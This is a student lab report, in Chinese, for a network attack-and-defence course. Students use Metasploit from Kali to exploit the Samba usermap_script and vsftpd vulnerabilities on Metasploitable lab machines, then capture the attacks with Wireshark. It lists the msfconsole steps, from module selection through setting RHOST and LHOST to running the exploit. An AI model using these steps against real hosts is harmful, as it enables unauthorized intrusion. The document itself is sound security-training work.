20232801 2023-2024-2 《网络攻防实践》实践七报告
1.实践内容
(1)使用Metasploit进行Linux远程渗透攻击
使用Metasploit渗透测试软件,攻击Linux靶机上的Samba服务Usermap_script安全漏洞,获取目标Linux靶机的主机访问权限。
(2)实践作业:攻防对抗实践
两人都需要做攻击方,与防守方
攻击方:使用 Metasploit ,对靶机中发现的漏洞进行攻击,再实验中用到了两个samba;vsftp
防守方:使用wireshark监听获得网络攻击额度数据包文件。
2.实践过程
本次实验使用的攻击机为Kali,IP地址为192.168.86.223;靶机为Metasploit Ubuntu,IP地址为192.168.86.73:
首先在Kali上打开Metasploit。
msfconsole
查找要使用的漏洞对应的模块
search samba
使用第八个漏洞 有两个命令可以使用
use 8
use exploit/multi/samba/usermap_script
show payloads
:查看可以所需要的参数
配置相应的参数
设置靶机:
set RHOST 192.168.86.73
设计攻击机:
set LHOST 192.168.86.223
设置完成后,输入exploit进行攻击
攻击成功
2.攻防对抗实践 (在这里我们使用‘了两个漏洞)
1、使用的漏洞为:sermap_script
- 攻击实验
Kali-Linux攻击机(刘莹):192.168.86.223
Metasploitable_ubuntu靶机(黄千里):192.168.86.208
第一步测试连通性:联通成功
扫描目标靶机的开放端口号与版本信息
与上述步骤一直,设置我的kali为攻击机,黄千里的为靶机
- 防守实验
Kali-Linux攻击机(千里):192.168.86.194
Metasploitable_ubuntu靶机(刘莹):192.168.86.73
打开wireshark进行抓包 看到其攻击
2、使用的漏洞为:vsftp
重新下载了一个虚拟机:metasploitable2-linux
- 攻击实验
Kali-Linux攻击机 (刘莹)192.168.86.223
metasploitable2-linux靶机(黄千里) 192.168.86.206
查看 vsftp ,use 0 进行使用
与上文一样设置网段,进行攻击,攻击成功
- 防守实验:
Kali-Linux攻击机(千里):192.168.86.194
Metasploitable_ubuntu靶机(刘莹):192.168.86.237
使用wireshark 抓取。iipaddr == 192.168.86.194 && ip.addr ==192.168.86.237
3.学习中遇到的问题及解决
问题1:双方使用同一局域网但是网段不在一起
- 问题1解决方案:更换网络适配器的连接模式,ping 其他任意地址,再重启。
- 问题2:Metasploitable_ubuntu 中能对samba进行攻击
- 问题2解决方案:根据群里面的方法下载新的虚拟机Metasploitable_ubuntu 使用vsftp漏洞
4.实践总结
通过本次实验,我学会了如何进行远程渗透攻击,再次熟悉了Metasploit工具的使用,其次通过攻防对抗过程,学会了如何使用wireshark对攻击进行查看获取。
参考资料
- …